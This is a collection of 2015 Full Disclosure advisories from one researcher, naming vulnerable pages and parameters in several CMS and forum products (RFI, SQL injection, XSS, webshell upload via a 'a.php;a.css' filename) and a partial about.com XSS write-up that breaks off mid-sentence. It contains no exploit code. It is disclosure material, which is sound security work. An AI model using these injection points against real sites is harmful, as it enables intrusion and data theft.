Latest Update: Feb 25, 2015
Vulnerability Type: Improper Control of Filename for Include/Require
Statement in PHP Program ('PHP Remote File Inclusion') [CWE-98]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
NetCat


*Product & Version:*
NetCat
3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL & Download:*
NetCat can be downloaded from here,
http://netcat.ru/


*Product Introduction:*
NetCat.ru is russian local company. "NetCat designed to create an absolute
majority of the types of sites: from simple "business card" with a minimum
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects completely
different directions and at any level of complexity. View examples of sites
running on NetCat CMS can be in a special section."

"Manage the site on the basis of NetCat can even inexperienced user,
because it does not require knowledge of Internet technologies, programming
and markup languages. NetCat constantly improving, adds new features. In
the process of finalizing necessarily take into account the wishes of our
partners and clients, as well as trends in Internet development. More than
2,000 studios and private web developers have chosen for their projects is
NetCat, and in 2013 sites, successfully working on our CMS, created more
than 18,000."





*(2) Vulnerability Details:*
NetCat has a security bug problem. It can be exploited by Remote File
Inclusion (RFI) attacks.

*(2.1)* The first vulnerability occurs at "/eshop/index.php?" page with
"INCLUDE_FOLDER" parameter.

*(2.2)* The second vulnerability occurs at "add.php?" page with
"INCLUDE_FOLDER" parameter.

*(2.3)* The third vulnerability occurs at "netcat/index.php?" page with
"INCLUDE_FOLDER" parameter.

*(2.4)* The forth vulnerability occurs at "s_loadenv.inc.php?" page with
"INCLUDE_FOLDER" parameter.

*(2.5) *The fifth vulnerability occurs at "*.pdf/index.php?" page with
"INCLUDE_FOLDER" parameter.










*References:*
http://tetraph.com/security/remote-local-file-inclusion-vulnerability/netcat-cms-multiple-remote-file-inclusion-rfi-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/netcat-cms-multiple-remote-file.html
http://www.inzeed.com/kaleidoscope/computer-security/netcat-cms-multiple-remote-file-inclusion-rfi-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-multiple-remote-file-inclusion-rfi-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/netcat-cms-multiple-remote-file-inclusion-rfi-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=2







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Comsenz SupeSite CMS Arbitrary Code Execution Security Vulnerabilities

[Jing Wang]

*Comsenz SupeSite CMS Arbitrary Code Execution Security Vulnerabilities*



Exploit Title: Comsenz SupeSite CMS Arbitrary Code Execution Security
Vulnerabilities
Product: SupeSite CMS (Content Management System)
Vendor: Comsenz
Vulnerable Versions: 6.0.1UC   7.0
Tested Version: 7.0
Advisory Publication: Feb 25, 2015
Latest Update: Feb 25, 2015
Vulnerability Type: Improper Control of Generation of Code ('Code
Injection') [CWE 94]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]






*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:* Comsenz


*Product & Version:*
SupeSite6.0.1UC
SupeSite7.0


*Vendor URL & Download:*
SupeSite can be downloaded from here,
http://www.comsenz.com/products/other/supesite
http://www.comsenz.com/downloads/install/supesite#down_open


*Source code:*
http://www.8tiny.com/source/supesite/nav.html?index.html


*Product Introduction:*
"SupeSite is an independent content management (CMS) function, and
integrates Web2.0 community personal portal system X-Space, has a strong
aggregation of community portal systems. SupeSite station can be achieved
within the forum (Discuz!), personal space (X-Space) information content
aggregation. Any webmaster , are available through SupeSite, easy to build
a community portal for Web2.0."

"Features include: information management, information dissemination,
information audit, information classification, information and other custom
fields, make your site easier to manage and maintain. Information
permissions and user group permissions combine owners can publish
information, management, audit and other permissions are set to different
groups of users, so that the specified user group has information
management functions."




*(2) Vulnerability Details:*
SupeSite has a security bug problem. It can be exploited by Arbitrary Code
Execution attacks.


*(2.1)* The vulnerability occurs at normal administer CSS editor field. If
files such as "a.php;a.css" "*.php;*.css" are inserted. Normal administer
can insert a webshell to control the backstage management system.









*References:*
http://tetraph.com/security/arbitrary-code-execution-vulnerability/comsenz-supesite-cms-arbitrary-code-execution-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/comsenz-supesite-cms-arbitrary-code.html
http://www.inzeed.com/kaleidoscope/computer-security/comsenz-supesite-cms-arbitrary-code-execution-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/comsenz-supesite-cms-arbitrary-code-execution-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/comsenz-supesite-cms-arbitrary-code-execution-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=2







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] Comsenz SupeSite CMS Reflected XSS (Cross-site Scripting) Security Vulnerabilities

[Jing Wang]

*Comsenz SupeSite CMS Reflected XSS (Cross-site Scripting) Security
Vulnerabilities*



Exploit Title: Comsenz SupeSite CMS /cp.php do parameter Reflected XSS
Security Vulnerabilities
Product: SupeSite CMS (Content Management System)
Vendor: Comsenz
Vulnerable Versions: 6.0.1UC   7.0
Tested Version: 7.0
Advisory Publication: Feb 25, 2015
Latest Update: Feb 25, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]




*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:* Comsenz


*Product & Version:*
SupeSite6.0.1UC
SupeSite7.0


*Vendor URL & Download:*
SupeSite can be downloaded from here,
http://www.comsenz.com/products/other/supesite
http://www.comsenz.com/downloads/install/supesite#down_open


*Source code:*
http://www.8tiny.com/source/supesite/nav.html?index.html


*Product Introduction:*
"SupeSite is an independent content management (CMS) function, and
integrates Web2.0 community personal portal system X-Space, has a strong
aggregation of community portal systems. SupeSite station can be achieved
within the forum (Discuz!), personal space (X-Space) information content
aggregation. Any webmaster , are available through SupeSite, easy to build
a community portal for Web2.0."

"Features include: information management, information dissemination,
information audit, information classification, information and other custom
fields, make your site easier to manage and maintain. Information
permissions and user group permissions combine owners can publish
information, management, audit and other permissions are set to different
groups of users, so that the specified user group has information
management functions."



*(2) Vulnerability Details:*
SupeSite has a security bug problem. It can be exploited by Reflected XSS
(Cross-site Scripting) attacks.


*(2.1) *The vulnerability occurs at "cp.php?" page with "do" parameter.










*References:*
http://tetraph.com/security/xss-vulnerability/comsenz-supesite-cms-reflected-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/comsenz-supesite-cms-reflected-xss.html

http://www.inzeed.com/kaleidoscope/computer-security/comsenz-supesite-cms-reflected-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/comsenz-supesite-cms-reflected-xss-cross-site-scripting-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/comsenz-supesite-cms-reflected-xss-cross-site-scripting-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=3






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-9468 InstantASP InstantForum.NET Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

[Jing Wang]

*CVE-2014-9468 InstantASP InstantForum.NET Multiple XSS (Cross-Site
Scripting) Security Vulnerabilities*



Exploit Title: InstantASP InstantForum.NET Multiple XSS (Cross-Site
Scripting) Security Vulnerabilities
Product: InstantForum.NET
Vendor: InstantASP
Vulnerable Versions: v4.1.3   v4.1.1   v4.1.2   v4.0.0   v4.1.0   v3.4.0
Tested Version: v4.1.3   v4.1.1   v4.1.2
Advisory Publication: Feb 18, 2015
Latest Update: Feb 18, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9468
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
InstantASP


*Product & Version:*
InstantForum.NET
v4.1.3 v4.1.1 v4.1.2 v4.0.0 v4.1.0 v3.4.0


*Vendor URL & Download:*
InstantForum.NET can be downloaded from here,
http://docs.instantasp.co.uk/InstantForum/default.html?page=v413tov414guide.html


*Product Introduction:*
“InstantForum.NET is a feature rich, ultra high performance ASP.NET & SQL
Server discussion forum solution designed to meet the needs of the most
demanding online communities or internal collaboration environments. Now in
the forth generation, InstantForum.NET has been completely rewritten from
the ground-up over several months to introduce some truly unique features &
performance enhancements."

"The new administrator control panel now offers the most comprehensive
control panel available for any ASP.NET based forum today. Advanced
security features such as role based permissions and our unique Permission
Sets feature provides unparalleled configurable control over the content
and features that are available to your users within the forum. Moderators
can easily be assigned to specific forums with dedicated moderator
privileges for each forum. Bulk moderation options ensure even the busiest
forums can be managed effectively by your moderators."

"The forums template driven skinning architecture offers complete
customization support. Each skin can be customized to support a completely
unique layout or visual appearance. A single central style sheet controls
every aspect of a skins appearance. The use of unique HTML wrappers and
ASP.NET 1.1 master pages ensures page designers can easily integrate an
existing design around the forum. Skins, wrappers & master page templates
can be applied globally to all forums or to any specific forum."





*(2) Vulnerability Details:*
InstantForum.NET has a security problem. It can be exploited by XSS attacks.


*(2.1)* The first vulnerability occurs at “Join.aspx” page with "SessionID"
parameter of it.

*(2.2)* The second vulnerability occurs at “Logon.aspx” page with
"SessionID" parameter of it.









*References:*
http://tetraph.com/security/cves/cve-2014-9468-instantasp-instantforum-net-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-9468-instantasp.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9468
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9468
https://security-tracker.debian.org/tracker/CVE-2014-9468
http://www.cvedetails.com/cve/CVE-2014-9468/
http://www.security-database.com/detail.php?alert=CVE-2014-9468
http://packetstormsecurity.com/files/cve/CVE-2014-9468
http://www.pentest.it/cve-2014-9468.html
http://www.naked-security.com/cve/CVE-2014-9468/
http://www.inzeed.com/kaleidoscope/cves/cve-2014-9468/
http://007software.net/cve-2014-9468/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-9468/
https://vulnerabilitypost.wordpress.com/2015/02/18/cve-2014-9468/
https://security-tracker.debian.org/tracker/CVE-2014-9468








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] DLGuard SQL Injection Security Vulnerabilities

[Jing Wang]

DLGuard SQL Injection Security Vulnerabilities


Exploit Title: DLGuard /index.php c parameter SQL Injection Security
Vulnerabilities
Product: DLGuard
Vendor: DLGuard
Vulnerable Versions: v4.5
Tested Version: v4.5
Advisory Publication: Feb 18, 2015
Latest Update: Feb 18, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command (‘SQL Injection’) (CWE-89)
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
DLGuard


*Product & Version:*
DLGuard
v4.5


*Vendor URL & Download:*
DLGuard can be downloaded from here,
http://www.dlguard.com/dlginfo/index.php


*Product Introduction:*
“DLGuard is a powerful, yet easy to use script that you simply upload to
your website and then rest assured that your internet business is not only
safe, but also much easier to manage, automating the tasks you just don't
have the time for."

"DLGuard supports the three types, or methods, of sale on the internet:
<1>Single item sales (including bonus products!)
<2>Multiple item sales
<3>Membership websites"





*(2) Vulnerability Details:*
DLGuard has a security problem. It can be exploited by SQL Injection
attacks.


*(2.1)* The first vulnerability occurs at “index.php” page with ""c"
parameters of it.







*References:*
http://tetraph.com/security/sql-injection-vulnerability/dlguard-sql-injection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/dlguard-sql-injection-security.html





--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] DLGuard Full Path Disclosure (Information Leakage) Security Vulnerabilities

[Jing Wang]

*DLGuard Full Path Disclosure (Information Leakage) Security
Vulnerabilities*



Exploit Title: DLGuard /index.php c parameter Full Path Disclosure Security
Vulnerabilities
Product: DLGuard
Vendor: DLGuard
Vulnerable Versions: v4.5
Tested Version: v4.5
Advisory Publication: Feb 18, 2015
Latest Update: Feb 18, 2015
Vulnerability Type: Information Exposure [CWE-200]
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
DLGuard


*Product & Version:*
DLGuard
v4.5


*Vendor URL & Download:*
DLGuard can be downloaded from here,
http://www.dlguard.com/dlginfo/index.php


*Product Introduction:*
“DLGuard is a powerful, yet easy to use script that you simply upload to
your website and then rest assured that your internet business is not only
safe, but also much easier to manage, automating the tasks you just don't
have the time for."


"DLGuard supports the three types, or methods, of sale on the internet:
<1>Single item sales (including bonus products!)
<2>Multiple item sales
<3>Membership websites"





*(2) Vulnerability Details:*
DLGuard has a security problem. It can be exploited by Full Path Disclosure
attacks.


*(2.1)* The first vulnerability occurs at “index.php” page with ""c"
parameters of it.






*References:*
http://tetraph.com/security/full-path-disclosure-vulnerability/dlguard-full-path-disclosure-information-leakage-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/dlguard-full-path-disclosure.html







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] DLGuard Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

[Jing Wang]

*DLGuard Multiple XSS (Cross-Site Scripting) Security Vulnerabilities*



Exploit Title: DLGuard Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities

Product: DLGuard

Vendor: DLGuard

Vulnerable Versions: v5   v4.6   v4.5

Tested Version: v5   v4.6

Advisory Publication: Feb 18, 2015

Latest Update: Feb 18, 2015

Vulnerability Type: Cross-Site Scripting [CWE-79]

CVE Reference: *

Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







*Advisory Details:*




*(1) Vendor & Product Description:*



*Vendor:*
DLGuard



*Product & Version:*
DLGuard
v5   v4.6   v4.5



*Vendor URL & Download:*
DLGuard can be downloaded from here,

http://www.dlguard.com/dlginfo/index.php



*Product Introduction:*
“DLGuard is a powerful, yet easy to use script that you simply upload to
your website and then rest assured that your internet business is not only
safe, but also much easier to manage, automating the tasks you just don't
have the time for."

"DLGuard supports the three types, or methods, of sale on the internet:

<1>Single item sales (including bonus products!)

<2>Multiple item sales

<3>Membership websites"





*(2) Vulnerability Details:*
DLGuard has a security problem. It can be exploited by XSS attacks.


*(2.1)* The first vulnerability occurs at “index.php” page with "page" "c"
"redirect" parameters of it.

*(2.2)* The second vulnerability occurs at main page's search field with
"searchTerm" parameter in HTTP POST.








*References:*
http://tetraph.com/security/xss-vulnerability/dlguard-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/dlguard-multiple-xss-cross-site.html








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-9469 vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities

[Jing Wang]

*CVE-2014-9469  vBulletin XSS (Cross-Site Scripting) Security
Vulnerabilities*


Exploit Title: vBulletin XSS (Cross-Site Scripting) Security Vulnerabilities
Product: vBulletin Forum
Vendor: vBulletin
Vulnerable Versions: 5.1.3   5.0.5   4.2.2   3.8.7   3.6.7   3.6.0   3.5.4
Tested Version: 5.1.3 4.2.2
Advisory Publication: Feb 12, 2015
Latest Update: Feb 12, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9469
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]





*Advisory Details:*

*(1) Vendor & Product Description:*

*Vendor:*
vBulletin


*Product & Version: *
vBulletin Forum
5.1.3   5.0.5   4.2.2   3.8.7   3.6.7   3.6.0   3.5.4


*Vendor URL & Download: *
vBulletin can be downloaded from here,
https://www.vbulletin.com/purchases/


*Product Introduction:*
"vBulletin (vB) is a proprietary Internet forum software package developed
by vBulletin Solutions, Inc., a division of Internet Brands. It is written
in PHP and uses a MySQL database server."

"Since the initial release of the vBulletin forum product in 2000, there
have been many changes and improvements. Below is a list of the major
revisions and some of the changes they introduced. The current production
version is 3.8.7, 4.2.2, and 5.1.3."




*(2) Vulnerability Details:*
vBulletin has a security problem. It can be exploited by XSS attacks.

*(2.1) *The vulnerability occurs at "forum/help" page. Add "hash symbol"
first. Then add script at the end of it.






*References:*
http://tetraph.com/security/cves/cve-2014-9469-vbulletin-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-9469-vbulletin-xss-cross-site.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9469
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9469
https://security-tracker.debian.org/tracker/CVE-2014-9469
http://www.cvedetails.com/cve/CVE-2014-9469/
http://www.security-database.com/detail.php?alert=CVE-2014-9469
http://packetstormsecurity.com/files/cve/CVE-2014-9469
http://www.pentest.it/cve-2014-9469.html
http://www.naked-security.com/cve/CVE-2014-9469/
http://www.inzeed.com/kaleidoscope/cves/cve-2014-9469/
http://007software.net/cve-2014-9469/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-9469/
https://computertechhut.wordpress.com/2015/02/12/cve-2014-9469/
https://security-tracker.debian.org/tracker/CVE-2014-9469






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] CVE-2014-8753 Cit-e-Net Multiple XSS (Cross-Site Scripting) Security Vulnerabilities

[Jing Wang]

*CVE-2014-8753  Cit-e-Net Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities*


Exploit Title: Cit-e-Net Multiple XSS (Cross-Site Scripting) Security
Vulnerabilities
Product: Cit-e-Access
Vendor: Cit-e-Net
Vulnerable Versions: Version 6
Tested Version: Version 6
Advisory Publication: Feb 12, 2015
Latest Update: Feb 12, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-8753
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]





*Advisory Details:*
*(1) Vendor & Product Description:*

*Vendor:*
Cit-e-Net

*Product & Version: *
Cit-e-Access
Version 6

*Vendor URL & Download: *
Cit-e-Net can be downloaded from here,
https://www.cit-e.net/citeadmin/help/cntrainingmanualhowto.pdf
http://demo.cit-e.net/
http://www.cit-e.net/demorequest.cfm
http://demo.cit-e.net/Cit-e-Access/ServReq/?TID=1&TPID=17

*Product Introduction:*
"We are a premier provider of Internet-based solutions encompassing web
site development and modular interactive e-government applications which
bring local government, residents and community businesses together."

"Cit-e-Net provides a suite of on-line interactive services to counties,
municipalities, and other government agencies, that they in turn can offer
to their constituents. The municipal government achieves a greater degree
of efficiency and timeliness in conducting the daily operations of
government, while residents receive improved and easier access to city hall
through the on-line access to government services."




*(2) Vulnerability Details:*
Cit-e-Access has a security problem. It can be exploited by XSS attacks.

*(2.1)* The first vulnerability occurs at "/eventscalendar/index.cfm?" page
with "&DID" parameter in HTTP GET.

*(2.2)* The second vulnerability occurs at "/search/index.cfm?" page with
"&keyword" parameter in HTTP POST.

*(2.3)* The third vulnerability occurs at "/news/index.cfm" page with
"&jump2" "&DID" parameter in HTTP GET.

*(2.4)* The fourth vulnerability occurs at "eventscalendar?" page with
"&TPID" parameter in HTTP GET.

*(2.5) *The fifth vulnerability occurs at "/meetings/index.cfm?" page with
"&DID" parameter in HTTP GET.




*(3) Solutions:*
Leave message to vendor. No response.
http://www.cit-e.net/contact.cfm









*References:*
http://tetraph.com/security/cves/cve-2014-8753-cit-e-net-multiple-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/cve-2014-8753-cit-e-net-multiple-xss.html
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8753
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8753
https://security-tracker.debian.org/tracker/CVE-2014-8753
http://www.cvedetails.com/cve/CVE-2014-8753/
http://www.security-database.com/detail.php?alert=CVE-2014-8753
http://packetstormsecurity.com/files/cve/CVE-2014-8753
http://www.inzeed.com/kaleidoscope/cves/cve-2014-8753/
http://www.pentest.it/cve-2014-8753.html
http://www.naked-security.com/cve/CVE-2014-8753/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/cve-2014-8753/
http://007software.net/cve-2014-8753/
https://itinfotechnology.wordpress.com/2015/02/12/cve-2014-8753/
https://security-tracker.debian.org/tracker/CVE-2014-8753







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/justqdjing

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] My Little Forum Multiple XSS Security Vulnerabilities

[Jing Wang]

*My Little Forum Multiple XSS Security Vulnerabilities*




Exploit Title: My Little Forum Multiple XSS Security Vulnerabilities
Vendor: My Little Forum
Product: My Little Forum
Vulnerable Versions: 2.3.3  2.2  1.7
Tested Version: 2.3.3  2.2  1.7
Advisory Publication: Feb 2, 2015
Latest Update: Feb 2, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
CVSS Severity (version 2.0):
CVSS v2 Base Score: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N) (legend)
Impact Subscore: 2.9
Exploitability Subscore: 8.6
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]








*Advisory Details:*

*(1) Vendor & Product Description*

*Vendor:*
My Little Forum



*Product & Version:*
My Little Forum
2.3.3
2.2
1.7



*Vendor URL & Download:*
http://mylittleforum.net/




*Product Description:*
“my little forum is a simple PHP and MySQL based internet forum that
displays the messages in classical threaded view (tree structure). It is
Open Source licensed under the GNU General Public License. The main claim
of this web forum is simplicity. Furthermore it should be easy to install
and run on a standard server configuration with PHP and MySQL.”






*(2) Vulnerability Details:*
My Little Forum has a security problem. It can be exploited by XSS attacks.


*(2.1) *The first vulnerability occurs at "forum.php?" page with "page",
"category" parameters.




*(2.2)* The second vulnerability occurs at "board_entry.php?" page with
"page", " order" parameters.




*(2.3)* The third vulnerability occurs at  "forum_entry.php" page with
"order", "page" parameters.








*References:*
http://tetraph.com/security/xss-vulnerability/my-little-forum-multiple-xss-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/my-little-forum-multiple-xss-security.html








--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] About Group (about.com) All Topics (At least 99.88% links) Vulnerable to XSS & Iframe Injection Security Attacks, About.com Open Redirect Security Vulnerabilities

[Jing Wang]

*About Group (about.com ) All Topics (At least 99.88%
links) Vulnerable to XSS & Iframe Injection Security Attacks, About.com
Open Redirect Security Vulnerabilities*




*Vulnerability Description:*
About.com all "topic sites" are vulnerable to XSS (Cross-Site Scripting)
and Iframe Injection (Cross Frame Scripting) attacks. This means all
sub-domains of about.com are affected. Based on a self-written program,
94357 links were tested. Only 118 links do not belong to the topics
(Metasites) links. Meanwhile, some about.com main pages are vulnerable to
XSS attack, too. This means no more than 0.125% links are not affected. At
least 99.875% links of About Group are vulnerable to XSS and Iframe
Injection attacks. In fact, for about.com's structure, the main domain is
something just like a cover. So, very few links belong to them.

Simultaneously, the About.com main page's search field is vulnerable to XSS
attacks, too. This means all domains related to about.com are vulnerable to
XSS attacks.

For the Iframe Injection vulnerability. They can be used to do DOS
(Denial-of-Service Attack) to other websites, too.

In the last, some "Open Redirect" vulnerabilities related to about.com are
introduced. There may be large number of other Open Redirect
Vulnerabilities not detected. Since About.com are trusted by some the other
websites. Those vulnerabilities can be used to do "Covert Redirect" to
these websites.





*Vulnerability Disclosure:*
Those vulnerabilities were reported to About on Sunday, Oct 19, 2014. No
one replied. Until now, they are still unpatched.





*Vulnerability Discover:*
Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and
Mathematical Sciences (SPMS), Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing






*(1) Some Basic Background*

*(1.1) Domain Description:*
http://www.about.com/

"For March 2014, 61,428,000 unique visitors were registered by comScore for
About.com, making it the 16th-most-visited online property for that month."
(The New York Times)

"About.com, also known as The About Group (formerly About Inc.), is an
Internet-based network of content that publishes articles and videos about
various subjects on its "topic sites," of which there are nearly 1,000. The
website competes with other online resource sites and encyclopedias,
including those of the Wikimedia Foundation" (Wikipedia)

"As of May 2013, About.com was receiving about 84 million unique monthly
visitors." (TechCrunch. AOL Inc.)

"According to About's online media kit, nearly 1,000 "Experts" (freelance
writers) contribute to the site by writing on various topics, including
healthcare and travel." (About.com)




*(1.2) Topics Related to About.com*
"The Revolutionary About.com Directory and Community Metasite. Hundreds of
real live passionate Guides covering Arts, Entertainment, Business,
Industry, Science, Technology, Culture, Health, Fitness, Games,Travel,
News, Careers, Jobs, Sports, Recreation, Parenting, Kids, Teens, Moms,
Education, Computers, Hobbies and Local Information." (azlist.about.com)

About.com - Sites A to Z
Number of Topics
A: 66
B: 61
C: 118
D: 49
E: 33
F: 57
G: 39
H: 48
I: 32
J: 15
K: 13
L: 36
M: 70
N: 26
O: 23
P: 91
Q: 4
R: 32
S: 104
T: 47
U: 12
V: 9
W: 43
X: 1
Y: 4
Z: 1
SUM: 1039

Reference:
azlist.about.com/

In fact, those are not all topics of about.com. Some of the topics are not
listed here such as,
http://specialchildren.about.com

So, there are more than 1000 topics related to about.com





*(1.3) Result of Exploiting XSS Attacks*
"Exploited XSS is commonly used to achieve the following malicious results
Identity theft
Accessing sensitive or restricted information
Gaining free access to otherwise paid for content
Spying on user’s web browsing habits
Altering browser functionality
Public defamation of an individual or corporation
Web application defacement
Denial of Service attacks (DOS)
" (Acunetix)






*(1.4) Basics of Iframe Injection (Cross-frame-Scripting) Vulnerabilities*
"In an XFS (Cross-frame-Scripting) attack, the attacker exploits a specific
cross-frame-scripting bug in a web browser to access private data on a
third-party website. The attacker induces the browser user to navigate to a
web page the attacker controls; the attacker's page loads a third-party
page in an HTML frame; and then JavaScript executing in the attacker's page
steals data from the third-party page." (OWASP)

"XFS also sometimes is used to describe an XSS attack which uses an HTML
frame in the attack. For example, an attacker might exploit a Cross Site
Scripting Flaw to inject a frame into a third-party web page; or an
attacker might create a page which uses a frame to load a third-party page
with an XSS flaw." (OWASP)






*(1.5) Basic of Open Redirect (Dest Redirect Privilege Escalation)
Vulnerabilities*
"An open redirect is an application that takes a parameter and redirects a
user to the parameter value 

